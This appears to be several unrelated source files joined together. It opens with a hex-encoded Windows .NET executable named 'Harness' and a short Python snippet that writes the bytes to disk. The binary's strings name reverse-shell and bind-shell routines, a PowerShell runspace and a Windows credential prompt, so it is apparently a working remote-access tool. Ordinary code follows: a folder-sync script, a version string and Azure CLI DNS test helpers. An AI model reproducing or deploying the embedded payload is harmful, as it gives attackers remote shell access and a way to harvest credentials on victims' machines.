0100000100ca0200000100bc0a000001009f0a00000100c30a00000200d30a000003009f0a00000100c30a00000200d30a000003009f0a000001009f0a000001009f0a000001009f0a00000100e30a00000100e30a00000100eb0a00000200f40a00000100fb0a00000200e30a00000300030b00000100fb0a00000200e30a00000300100b00000400180b00000100260b00000100100b000001002c0b00000100300b00000200380b00000300440b00000400510b000005005d0b000006006d0b000007007b0b000008008c0b00000900980b00000100a80b00000200b40b00000300be0b00000400ca0b00000500d70b02000600e80b02000700250c000008003a0c00000900400c00000100300b00000200510b000003008c0b00000400460c00000500590c00000100fb0a00000200e30a000003006e0c00000400770c00000100fb0a00000200e30a000003006e0c00000400770c00000500820c00000600990c000001009f0a000001009f0a000001009f0a000001009f0a000001009f0a00000100a10c00000100990c00000100ab0c00000200b20c00000300be0c00000400c30c00000100a10c00000200c30c00000100c80c00000200cf0c000001009f0a000001009f0a000001009f0a00000100ca02000002003901000003000e0100000100b30a00000200d80c00000300e40c00000400ea0c00000100fa0c00000100010d00000200070d00000300090d00000100100d00000200070d00000300090d2901fb0135003101fb015b003901fb015b004101fb015b004901fb015b005101fb015b005901fb015b006101fb015b006901fb015b007101fb013d007901fb015b008101fb015b008901fb015b009101fb0146009901fb013500a901fb013500b101590f08020900fb0135004900690f120249008c0f1702d101b50f1e023900d40f27023900e60f35004100eb0f2e024100f20f3302e1011710460231001d104200e9013c105102e90146105702f10157108600f10161105f02f10168106502f10161106b02f10174108600e9017c10510201028d107102e9014610ed0111000f038f00190001045b00f1019e107702f101ac107c02190018045b003100b61035003900bc1035004100bc1035003100fb0135000902fb0190023100d91096021102ed1046022102fb01960221020811350021020e1151000c00fb01350031023c11c3020c0045114200f1014f114200f1015a11e902f1016411ef02f1016c11f50241027b11fc0249028a11020341029311090309009b1186004102a41109034102ad1109034102b8110903f1016110100341028a1117034102cc1120035102db112c035102f11130035102fb1137035102ff113003410210120903f10161104003410020126d0341002a126d031400fb0135001c00fb01830314005712890341007312940369028b129a032400571289034100a212ae037902ae1239004100be12ca033900dd12cf0381020213d50389021413db0341003c13e10399024913350014004f13f6032c0065130604340073131804a9029e133900b102bc10350024004f13f6032400491335003c006513060444007313180419002d045b005900b3135e041100fb0135006100fb016c04e101bb137c04e10137039400e1014a039400b902fb015b001900fb013500e901e51387044c00fb0135005400651306045c00731318049900ee1386001900230686009900f20286008900f813aa044c000314b004a900fb01350064000c14e902f1011014de04a9001714e5046c0045114200f1011014f204f1011e145701f9019b1186006400fb016c046c0024141805a100ee13860064002d141e05c102fb015b00c90260145401d1026d143a05c900fb013500a900fb014600f10174143f05c900801444057400fb018303b90194145005c9009c143500b100fb0163051900dd052f01e102fb019805d100ca144600d100d4144600d900df144600d900e51446002900fb0135003100eb14bd05f102fb0183030901fb01c30509014c155b00a1019b118600f90261153900f9026d153900f9029a0af301f9021804fb012e003b00fa052e007b0052062e001b00f4052e002300f4052e002b00f4052e003300f4052e001300e2052e004300f4052e005300f4052e005b0012062e006b003c062e007300490603018300030239023e0242024b0281029e02ab02d6024803e7031d044804630468047204770482048d04b804f804090525056a0585058a058f059f05a405a905ae05d105d805dd0502000100030003000400090006000b000000b60267000000c1026b000000bc0399000000c7039e000000fb02a2000000cc03a7000000cf03ac000000de03ac00000060069e00000067064f0100002209bd0100003209c20100003d09c70100004c096b0000005709bd0100006709670000007409c20100008a09c20100009809c7010000a709c2010000b2099e00020002000300010003000300020004000500010005000500020011000700020012000900020013000b00020014000d00020015000f0002001600110002002800130002003300150002003600170001003700170001003900190002003800190002003a001b0001003b001b0002003c001d0001003d001d0002003f001f00010040001f0002004200210002004300230002004400250001004a00270002004900270001004c00290002004b00290002004d002b0001004e002b0044144e14bb0273037b03a503ff03100437043f0493049b04a204d604eb04490500015b004a05010006015d007205020006015f009105020046016100b30502005020000028000480000001000000000000000000000000001600000002000000000000000000000001007c00000000000100000000000000000000000a00930000000000020000000000000000000000010085000000000003000200040002000500040006000200a900c30317015f050000003c4d6f64756c653e004861726e6573732e657865004861726e65737300437573746f6d5053486f737400437573746f6d5053486f737455736572496e74657266616365004352454455495f494e464f00437573746f6d505352486f737452617755736572496e7465726661636500437573746f6d53747265616d006d73636f726c69620053797374656d004f626a6563740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e0053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e486f7374005053486f7374005053486f737455736572496e746572666163650056616c756554797065005053486f737452617755736572496e74657266616365005345435552450073747265616d0053797374656d2e4e65742e536f636b65747300546370436c69656e7400636c69656e7400736c65657000464f524d41540072656d6f746549505f6279746573006c6f63616c49505f62797465730072656d6f7465506f7274006c6f63616c506f72740073686f756c64457869740065786974436f646500686f73740053797374656d2e4d616e6167656d656e742e4175746f6d6174696f6e2e52756e7370616365730052756e7370616365006d7952756e537061636500506f7765725368656c6c00707300496e697469616c53657373696f6e5374617465007374617465002e63746f72006765745f53686f756c6445786974007365745f53686f756c6445786974006765745f45786974436f6465007365745f45786974436f6465004d61696e0052756e00436c65616e557000526576657273655368656c6c0042696e645368656c6c00497356616c69640050726f636573734c6f63616c0050726f636573735053004461746141646465644576656e74417267730050534f75747075745f446174614164646564004572726f725f4461746141646465640053686f756c64457869740045786974436f64650070726f6772616d0047756964005f686f73744964005f7569006765745f496e7374616e63654964006765745f4e616d650056657273696f6e006765745f56657273696f6e006765745f55490053797374656d2e476c6f62616c697a6174696f6e0043756c74757265496e666f006765745f43757272656e7443756c74757265006765745f43757272656e74554943756c7475726500456e7465724e657374656450726f6d707400457869744e657374656450726f6d7074004e6f74696679426567696e4170706c69636174696f6e004e6f74696679456e644170706c69636174696f6e0053657453686f756c644578697400496e7374616e63654964004e616d650055490043757272656e7443756c747572650043757272656e74554943756c74757265005f72617755690053656e644f75747075740057726974654c696e6500436f6e736f6c65436f6c6f7200577269746500577269746544656275674c696e650057726974654572726f724c696e65005772697465566572626f73654c696e650057726974655761726e696e674c696e650050726f67726573735265636f726400577269746550726f6772657373006765745f4f75747075740053797374656d2e436f6c6c656374696f6e732e47656e657269630044696374696f6e61727960320050534f626a6563740053797374656d2e436f6c6c656374696f6e732e4f626a6563744d6f64656c00436f6c6c656374696f6e6031004669656c644465736372697074696f6e0050726f6d70740043686f6963654465736372697074696f6e0050726f6d7074466f7243686f69636500476574486f746b6579416e644c6162656c004275696c64486f746b657973416e64506c61696e4c6162656c7300436f5461736b4d656d467265650053797374656d2e5465787400537472696e674275696c6465720043726564556e5061636b41757468656e7469636174696f6e4275666665720043726564554950726f6d7074466f7257696e646f777343726564656e7469616c7300437265645061636b41757468656e7469636174696f6e42756666657200505343726564656e7469616c0050726f6d7074466f7243726564656e7469616c00505343726564656e7469616c547970657300505343726564656e7469616c55494f7074696f6e73006765745f526177554900526561644c696e650053797374656d2e536563757269747900536563757265537472696e6700526561644c696e654173536563757265537472696e67004f757470757400526177554900636253697a650068776e64506172656e740070737a4d657373616765546578740070737a43617074696f6e546578740068626d42616e6e65720053697a65005f77696e646f7753697a6500436f6f7264696e61746573005f637572736f72506f736974696f6e005f637572736f7253697a65005f666f726567726f756e64436f6c6f72005f6261636b67726f756e64436f6c6f72005f6d6178506879736963616c57696e646f7753697a65005f6d617857696e646f7753697a65005f62756666657253697a65005f77696e646f77506f736974696f6e005f77696e646f775469746c65006765745f4261636b67726f756e64436f6c6f72007365745f4261636b67726f756e64436f6c6f72006765745f42756666657253697a65007365745f42756666657253697a65006765745f437572736f72506f736974696f6e007365745f437572736f72506f736974696f6e006765745f437572736f7253697a65007365745f437572736f7253697a6500466c757368496e707574427566666572006765745f466f726567726f756e64436f6c6f72007365745f466f726567726f756e64436f6c6f720042756666657243656c6c0052656374616e676c6500476574427566666572436f6e74656e7473006765745f4b6579417661696c61626c65006765745f4d6178506879736963616c57696e646f7753697a65006765745f4d617857696e646f7753697a65004b6579496e666f00526561644b65794f7074696f6e7300526561644b6579005363726f6c6c427566666572436f6e74656e747300536574427566666572436f6e74656e7473006765745f57696e646f77506f736974696f6e007365745f57696e646f77506f736974696f6e006765745f57696e646f7753697a65007365745f57696e646f7753697a65006765745f57696e646f775469746c65007365745f57696e646f775469746c65004261636b67726f756e64436f6c6f720042756666657253697a6500437572736f72506f736974696f6e00437572736f7253697a6500466f726567726f756e64436f6c6f72004b6579417661696c61626c65004d6178506879736963616c57696e646f7753697a65004d617857696e646f7753697a650057696e646f77506f736974696f6e0057696e646f7753697a650057696e646f775469746c65004e6574776f726b53747265616d00636c6561725f73747265616d0053797374656d2e4e65742e53656375726974790053736c53747265616d007365637572655f73747265616d0053797374656d2e53656375726974792e43727970746f6772617068792e58353039436572746966696361746573005835303943657274696669636174650058353039436861696e0053736c506f6c6963794572726f72730056616c69646174655365727665724365727469666963617465004279746573546f49507634537472696e670043616e526561640043616e577269746500526561640076616c75650061726773006461746100636d640073656e6465720065006f757470757400666f726567726f756e64436f6c6f72006261636b67726f756e64436f6c6f72006d65737361676500736f757263654964007265636f72640063617074696f6e006465736372697074696f6e730063686f696365730064656661756c7443686f69636500696e70757400707472006477466c616773007041757468427566666572006362417574684275666665720070737a557365724e616d6500706363684d6178557365724e616d650070737a446f6d61696e4e616d6500706363684d6178446f6d61696e616d650070737a50617373776f726400706363684d617850617373776f7264006e6f74557365644865726500617574684572726f7200617574685061636b61676500496e4175746842756666657200496e4175746842756666657253697a65007265664f7574417574684275666665720053797374656d2e52756e74696d652e496e7465726f705365727669636573004f7574417474726962757465007265664f75744175746842756666657253697a6500665361766500666c61677300705061636b656443726564656e7469616c73007063625061636b656443726564656e7469616c7300757365724e616d65007461726765744e616d6500616c6c6f77656443726564656e7469616c5479706573006f7074696f6e730072656374616e676c6500736f757263650064657374696e6174696f6e00636c69700066696c6c006f726967696e00636f6e74656e747300636572746966696361746500636861696e0073736c506f6c6963794572726f7273006261727261790062797465730078004c656e677468006f757470757442797465730053797374656d2e5265666c656374696f6e00417373656d626c795469746c6541747472696275746500417373656d626c794465736372697074696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c79436f6d70616e7941747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7943756c7475726541747472696275746500436f6d56697369626c65417474726962757465004775696441747472696275746500417373656d626c7956657273696f6e41747472696275746500417373656d626c7946696c6556657273696f6e4174747269627574650053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c6974794174747269627574650042797465003c50726976617465496d706c656d656e746174696f6e44657461696c733e7b42413132413632352d413932322d343233372d413330412d3834353745373034343734337d00436f6d70696c657247656e6572617465644174747269627574650024246d6574686f643078363030303030312d310052756e74696d6548656c706572730041727261790052756e74696d654669656c6448616e646c6500496e697469616c697a6541727261790043726561746544656661756c7400417574686f72697a6174696f6e4d616e61676572007365745f417574686f72697a6174696f6e4d616e616765720052756e7370616365466163746f72790043726561746552756e73706163650050535468726561644f7074696f6e73007365745f5468726561644f7074696f6e73004f70656e00437265617465007365745f52756e73706163650053797374656d2e546872656164696e670054687265616400536c656570006765745f5265636569766542756666657253697a6500456e636f64696e67006765745f415343494900476574537472696e6700537472696e67005472696d004368617200436f6e636174006f705f457175616c69747900546f4c6f776572006765745f5554463800436f6e766572740046726f6d426173653634537472696e670049734e756c6c4f72456d707479006765745f436861727300436c6f736500446973706f73650053797374656d2e4e65740049504164647265737300436f6e6e65637400456e7669726f6e6d656e74004578697400457863657074696f6e005463704c697374656e657200537461727400416363657074546370436c69656e7400505350617273654572726f72005053506172736572005053546f6b656e00546f6b656e697a65006765745f436f756e74006765745f4c656e67746800537562737472696e67005472696d456e640053706c6974004461746554696d65006765745f4e6f7700446f75626c65005472795061727365004164644461797300546f537472696e6700416464486f757273004164644d696e75746573004164645365636f6e64730054696d655370616e006f705f5375627472616374696f6e006765745f546f74616c4d696c6c697365636f6e64730046726f6d486f757273004164640046726f6d4d696c6c697365636f6e6473004164644d696c6c697365636f6e64730041646453637269707400416464436f6d6d616e6400505344617461436f6c6c656374696f6e6031004576656e7448616e646c65726031006164645f4461746141646465640050534461746153747265616d73006765745f53747265616d73004572726f725265636f7264006765745f4572726f7200494173796e63526573756c7400426567696e496e766f6b65006765745f4973436f6d706c65746564006765745f52756e73706163650053657373696f6e537461746550726f7879006765745f53657373696f6e537461746550726f78790050617468496e7472696e73696373006765745f506174680050617468496e666f006765745f43757272656e7446696c6553797374656d4c6f636174696f6e005053436f6d6d616e64006765745f436f6d6d616e647300436c6561720052656164416c6c0049456e756d657261746f72603100476574456e756d657261746f72006765745f43757272656e740053797374656d2e436f6c6c656374696f6e730049456e756d657261746f72004d6f76654e6578740049446973706f7361626c65004e657747756964006765745f43757272656e74546872656164004e6f74496d706c656d656e746564457863657074696f6e004765744279746573006765745f4c6162656c00417350534f626a656374007365745f4974656d0047657400466f726d617400417070656e6400456d707479006765745f4974656d0053657400446c6c496d706f7274417474726962757465006f6c6533322e646c6c006372656475692e646c6c00496e74507472005a65726f004d61727368616c0053697a654f6600546f43686172417272617900417070656e644368617200416374696f6e603100466f7245616368004d616b65526561644f6e6c79005374727563744c61796f7574417474726962757465004c61796f75744b696e64007365745f5769647468007365745f486569676874007365745f58007365745f590047657453747265616d0052656d6f7465436572746966696361746556616c69646174696f6e43616c6c6261636b0053797374656d2e494f0053747265616d004c6f63616c436572746966696361746553656c656374696f6e43616c6c6261636b0041757468656e7469636174654173436c69656e74006765745f43616e52656164006765745f43616e577269746500000000093c00720066003e00000b3c002f00720066003e00000765006e006400000100575b0021005d0020005400720061006e00730066006500720020006500720072006f0072007300200066006f0075006e0064002e002000540072007900200069006d0070006f0072007400200061006700610069006e00000965007800690074000009710075006900740000073e003e002000001b65006e00610062006c0065002d0066006f0072006d0061007400011d640069007300610062006c0065002d0066006f0072006d0061007400010b73006c0065006500700000295b002b005d00200046006f0072006d0061007400740069006e006700200061006400640065006400002d5b002d005d00200046006f0072006d0061007400740069006e0067002000720065006d006f00760065006400011355004e0044004500460049004e00450044000003200000235b002b005d00200053006c0065006500700069006e006700200066006f007200200000272c0020006e006500780074002000630061006c006c006200610063006b00200061007400200000395b002d005d00200049006e00760061006c0069006400200073006c00650065007000200070006100720061006d006500740065007200200001050d000a0000154f00750074002d0053007400720069006e006700010750005300200000053e002000000f4800610072006e00650073007300004f45006e007400650072004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0020002000004b45007800690074004e0065007300740065006400500072006f006d007000740020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00200000030a00000f440045004200550047003a002000000f4500520052004f0052003a002000001356004500520042004f00530045003a00200000135700410052004e0049004e0047003a00200000155b007b0030007d005d0020007b0031007d00200000212800440065006600610075006c00740020006900730020007b0030007d002900002149006e00760061006c00690064002000630068006f006900630065003a00200000176e0075006c006c005f0064006f006d00610069006e0000032f00005552006500610064004c0069006e0065004100730053006500630075007200650053007400720069006e00670020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004946006c0075007300680049006e0070007500740042007500660066006500720020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004b47006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e0000414b006500790041007600610069006c00610062006c00650020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00003752006500610064004b006500790020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004f5300630072006f006c006c0042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e00740065006400004b53006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e007400650064002e00004953006500740042007500660066006500720043006f006e00740065006e007400730020006900730020006e006f007400200069006d0070006c0065006d0065006e0074006500640000032e000000000025a612ba22a93742a30a8457e70447430008b77a5c561934e0890831bf3856ad364e350206020306121c0306121902060803061d050306120c0306121d030612210306122503200001032000020420010102032000080420010108050001011d0e0420001219042001020e042001010e062002011c12290328000203280008030612080306112d03061210052001011208042000112d0320000e0420001231042000120d0420001235042800112d0328000e0428001231042800120d04280012350306121808200301113911390e062002010a123d112003151241020e12450e0e15124901124d0c2004080e0e151249011251080500011d0e0e0f0001140e02000200001512490112510400010118120009020818091255100812551008125510081200090810111408100918091018100910020809000502080e0e18100808200412590e0e0e0e0c200612590e0e0e0e115d116104200012150420001265042800121502061802060e030611690306116d0306113904200011390520010111390420001169052001011169042000116d05200101116d0c2001141171020002000011750620011179117d0b2004011175116d1175117107200201117511710d200201116d141171020002000004280011390428001169042800116d040612808104061280850820030112081219020d2004021c12808912808d1180910520010e1d05072003081d050808072003011d0508080401000000090002011280dd1180e10400001225062001011280e5080002121d12091225062001011180ed040000122105200101121d0407011d05030701020307010804000101080507021208020500001280f50720030e1d0508080500020e1c1c050002020e0e0500020e0e0e0500011d050e040001020e04200103080e070b030e0e0e02021d050e0e0802052001011d0507200201128105080c0704121912810512810d12190f0705128105128111121912810d121907151249011281151200021512490112811d0e1015124901128115120704151249011281151512490112811d02020520020e08080520010e1d030620011d0e1d03050000118121060002020e100d0620011181210d0600030e0e0e0e080002020e101181210b00021181291181211181210320000d0600011181290d0820011181291181290700040e0e0e0e0e2407140e021d0e1181211181211181291181210e0d0d0d0d1181290d021d030e020311812105200112210e071512812d0112450715128131011229052002011c180a200101151281310112290520001281350a20001512812d01128139081512812d011281391430020212813d1512812d011e001512812d011e01060a0212451245042000121d05200012814105200012814505200012814905200012814d0e07041512812d01124512813d0e020820001512490113000615124901124509200015128151011300071512815101124504200013001907051512812d01124515124901124512451512815101124502071512490112813908151281510112813915070415124901128139128139151281510112813902040000112d040701112d0307010e0520020108080407011231040701120d0500001280f104070112350520011d050e0507021d050207151241020e12450615124901124d071512815101124d05000112451c07200201130013011d0707151241020e1245124d1d0e0e151241020e12451512815101124d0207140e02000200000600030e0e1c1c05200112550e061512490112510500020e0e1c100707140e02000200001255080e0808020e07071d0e1d0e1d0e1d0e1d0302030520011300080620030108080e140705140e0200020000081d0e140e020002000002040001081c0420001d030420010103061512816d01030e100102011d1e001512816d011e00030a0103062002010e12651a07111114091809020e126512590812551255125508080812590204070112590407011215080705081d050e0e020620010111817504070111390407011169040701116d0e07061169116d116911691169116d0520001280810d20040112817d021281791281810607040e080e02040702020204070208021101000c486f73742050726f63657373000005010000000017010012436f7079726967687420c2a920203230313500002901002466353961636637662d306632362d343761312d386434322d61633266363130343234326200000c010007312e302e302e3000000801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301000000c06a00000000000000000000de6a0000002000000000000000000000000000000000000000000000d06a000000000000000000000000000000005f436f724578654d61696e006d73636f7265652e646c6c0000000000ff250020400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000588000007c02000000000000000000007c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000001000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004dc010000010053007400720069006e006700460069006c00650049006e0066006f000000b8010000010030003000300030003000340062003000000044000d000100460069006c0065004400650073006300720069007000740069006f006e000000000048006f00730074002000500072006f00630065007300730000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000038000c00010049006e007400650072006e0061006c004e0061006d00650000004800610072006e006500730073002e0065007800650000004800120001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a900200020003200300031003500000040000c0001004f0072006900670069006e0061006c00460069006c0065006e0061006d00650000004800610072006e006500730073002e006500780065000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000c000000f03a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
with open(input("Save as: "), "wb") as f:
f.write(bytearray.fromhex(raw_code))
|
py | 7dfaad3a0930ffb4d8d93ac7fc8c749cd7442f90 | # auto file synchronization
import os
import hashlib
import json
# create all file directory(exclude root) and md5 of path
def creatFileMD5Dict(root,path,listPathDir,dictFileMD5):
for name in os.listdir(path):
if name=="$RECYCLE.BIN" or name=="System Volume Information":
continue
childPath = path+os.sep+name
if os.path.isdir(childPath):
listPathDir.append(childPath[len(root):])
creatFileMD5Dict(root,childPath,listPathDir,dictFileMD5)
else:
with open(childPath,'rb') as file:
md5 = hashlib.md5(file.read()).hexdigest()
if md5 not in dictFileMD5:
dictFileMD5[childPath[len(root):]] = md5
# remove all of path(include file)
def removeDir(path):
for name in os.listdir(path):
childPath = path+os.sep+name
if os.path.isdir(childPath):
removeDir(childPath)
os.rmdir(childPath)
print('[del-dir] : ',childPath)
else:
os.remove(childPath)
print('[del-fil] : ',childPath)
# copy fileSource to fileTarget
def copyFile(fileSource,fileTarget):
with open(fileSource,'rb') as fs:
with open(fileTarget,'wb') as ft:
ft.write(fs.read())
print('[add-fil] : ',fileTarget)
# synchronize directory
def syncDir(pathSource,pathTarget,listSourceDir,listTargetDir):
for sDir in listSourceDir:
if sDir not in listTargetDir:
if os.path.isdir(pathSource+sDir):
removeDir(pathSource+sDir)
os.rmdir(pathSource+sDir)
print('[del-dir] : ',pathSource+sDir)
for tDir in listTargetDir:
if tDir not in listSourceDir:
os.mkdir(pathSource+tDir)
print('[add-dir] : ',pathSource+tDir)
# synchronize file
def syncFile(pathSource,pathTarget,dictSourceFileMD5,dictTargetFileMD5):
for sFile in dictSourceFileMD5:
if sFile not in dictTargetFileMD5:
if os.path.isfile(pathSource+sFile):
os.remove(pathSource+sFile)
print('[del-fil] : ',pathSource+sFile)
for tFile in dictTargetFileMD5:
if tFile in dictSourceFileMD5:
if dictSourceFileMD5[tFile] != dictTargetFileMD5[tFile]:
if os.path.isfile(pathSource+tFile):
os.remove(pathSource+tFile)
print('[del-fil] : ',pathSource+tFile)
copyFile(pathTarget+tFile,pathSource+tFile)
else:
copyFile(pathTarget+tFile,pathSource+tFile)
# read json file
def readJson():
jsonPath = os.getcwd()+os.sep+'path.json'
# print(jsonPath)
if os.path.isfile(jsonPath):
with open(jsonPath,'r') as f:
pathJson = json.load(f)
pathData = pathJson['path']
# print(pathData)
return pathData
# main entrance
def autoFileSync():
listSourceDir = [] # source dir exclude path_source
listTargetDir = [] # target dir exclude path_target
dictSourceFileMD5 = {} # source file path exclude path_source - file md5
dictTargetFileMD5 = {} # target file path exclude path_target - file md5
print('******************************** AUTO FILE SYNCHRONIZATION ********************************')
print('FUNCTION: SYNCHRONIZE TARGET PATH TO SOURCE PATH.')
# path_source = input('Please input your source path(F:\\\\source): ')
# path_target = input('Please input your target path(//192.168.0.101/target): ')
pathData = readJson()
for path in pathData:
path_source = path['source']
path_target = path['target']
print("Source Directory: ", path_source)
print("Target Directory: ", path_target)
if os.path.isdir(path_source):
if os.path.isdir(path_target):
creatFileMD5Dict(path_source,path_source,listSourceDir,dictSourceFileMD5)
print('Source Directory Count: ',len(listSourceDir))
print('Source File Count: ',len(dictSourceFileMD5))
creatFileMD5Dict(path_target,path_target,listTargetDir,dictTargetFileMD5)
print('Target Directory Count: ',len(listTargetDir))
print('Target File Count: ',len(dictTargetFileMD5))
syncDir(path_source,path_target,listSourceDir,listTargetDir)
syncFile(path_source,path_target,dictSourceFileMD5,dictTargetFileMD5)
else:
print('[error] : target path error!')
else:
print('[error] : source path error!')
print('******************************** AUTO FILE SYNCHRONIZATION ********************************')
autoFileSync()
input() |
py | 7dfaad7c859242c75261af5d0094b61225d7aa30 | # same version as in:
# - setup.py
# - stdeb.cfg
__version__ = '0.20.0'
|
py | 7dfaad93ae30e7b2e93690bd4a90dca9a7a392d8 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long
import os
import unittest
from azure.cli.testsdk import (ScenarioTest, ResourceGroupPreparer)
from ._test_data_generator import (GeneratePrivateZoneName,
GenerateVirtualNetworkName,
GenerateVirtualNetworkLinkName,
GenerateRecordSetName,
GeneratePrivateZoneArmId,
GenerateVirtualNetworkLinkArmId,
GenerateVirtualNetworkArmId,
GenerateRecordSetArmId,
GenerateTags)
from knack.log import get_logger
from knack.util import CLIError
from msrestazure.azure_exceptions import CloudError
logger = get_logger(__name__)
class BaseScenarioTests(ScenarioTest):
def _Validate_Zones(self, expectedZones, actualZones):
result = all(zone in actualZones for zone in expectedZones)
self.check(result, True)
def _Create_PrivateZones(self, numOfZones=2):
createdZones = list()
for num in range(numOfZones):
createdZones.append(self._Create_PrivateZone())
createdZones.sort(key=lambda x: x['name'])
return createdZones
def _Create_PrivateZone(self):
GeneratePrivateZoneName(self)
return self.cmd('az network private-dns zone create -g {rg} -n {zone}', checks=[
self.check('name', '{zone}'),
self.check_pattern('id', GeneratePrivateZoneArmId(self)),
self.check('location', 'global'),
self.check('type', 'Microsoft.Network/privateDnsZones'),
self.exists('etag'),
self.check('tags', None),
self.check('provisioningState', 'Succeeded'),
self.greater_than('maxNumberOfRecordSets', 0),
self.greater_than('maxNumberOfVirtualNetworkLinks', 0),
self.greater_than('maxNumberOfVirtualNetworkLinksWithRegistration', 0),
self.check('numberOfRecordSets', 1),
self.check('numberOfVirtualNetworkLinks', 0),
self.check('numberOfVirtualNetworkLinksWithRegistration', 0),
]).get_output_in_json()
def _Create_VirtualNetwork(self):
GenerateVirtualNetworkName(self)
return self.cmd('az network vnet create -g {rg} -n {vnet}', checks=[
self.check('newVNet.name', '{vnet}'),
self.check_pattern('newVNet.id', GenerateVirtualNetworkArmId(self))
]).get_output_in_json()
def _Validate_Links(self, expectedLinks, actualLinks):
result = all(link in actualLinks for link in expectedLinks)
self.check(result, True)
def _Create_VirtualNetworkLinks(self, numOfLinks=2):
self._Create_PrivateZone()
createdLinks = list()
for num in range(numOfLinks):
createdLinks.append(
self._Create_VirtualNetworkLink(createZone=False))
createdLinks.sort(key=lambda x: x['name'])
return createdLinks
def _Create_VirtualNetworkLink(self, registrationEnabled=False, createZone=True):
self.kwargs['registrationEnabled'] = registrationEnabled
if createZone is True:
self._Create_PrivateZone()
self._Create_VirtualNetwork()
GenerateVirtualNetworkLinkName(self)
return self.cmd('az network private-dns link vnet create -g {rg} -n {link} -z {zone} -v {vnet} -e {registrationEnabled}', checks=[
self.check('name', '{link}'),
self.check_pattern('id', GenerateVirtualNetworkLinkArmId(self)),
self.check('location', 'global'),
self.check('type', 'Microsoft.Network/privateDnsZones/virtualNetworkLinks'),
self.exists('etag'),
self.check('tags', None),
self.check_pattern('virtualNetwork.id', GenerateVirtualNetworkArmId(self)),
self.check('registrationEnabled', '{registrationEnabled}'),
self.check('provisioningState', 'Succeeded'),
self.check_pattern('virtualNetworkLinkState', 'InProgress|Completed')
]).get_output_in_json()
def _RecordType_To_FunctionName(self, key, operation):
type_dict = {
'a': {'Create': '_Create_ARecord', 'Delete': '_Delete_ARecord'},
'aaaa': {'Create': '_Create_AAAARecord', 'Delete': '_Delete_AAAARecord'},
'cname': {'Create': '_Create_CNAMERecord', 'Delete': '_Delete_CNAMERecord'},
'mx': {'Create': '_Create_MXRecord', 'Delete': '_Delete_MXRecord'},
'ptr': {'Create': '_Create_PTRRecord', 'Delete': '_Delete_PTRRecord'},
'srv': {'Create': '_Create_SRVRecord', 'Delete': '_Delete_SRVRecord'},
'txt': {'Create': '_Create_TXTRecord', 'Delete': '_Delete_TXTRecord'},
}
return type_dict[key.lower()][operation]
def _Create_RecordSet(self, recordType, zoneName):
self.kwargs['recordType'] = recordType.lower()
self.kwargs['zone'] = zoneName
GenerateRecordSetName(self)
self.cmd('az network private-dns record-set {recordType} create -g {rg} -n {recordset} -z {zone}', checks=[
self.check('name', '{recordset}'),
self.check_pattern('id', GenerateRecordSetArmId(self)),
self.check_pattern('type', 'Microsoft.Network/privateDnsZones/{recordType}'),
self.exists('etag'),
self.check('fqdn', '{recordset}.{zone}.'),
self.check('metadata', None),
self.check('isAutoRegistered', False),
self.check('ttl', 3600)
]).get_output_in_json()
return getattr(self, self._RecordType_To_FunctionName(recordType, 'Create'))(self.kwargs['recordset'], zoneName)
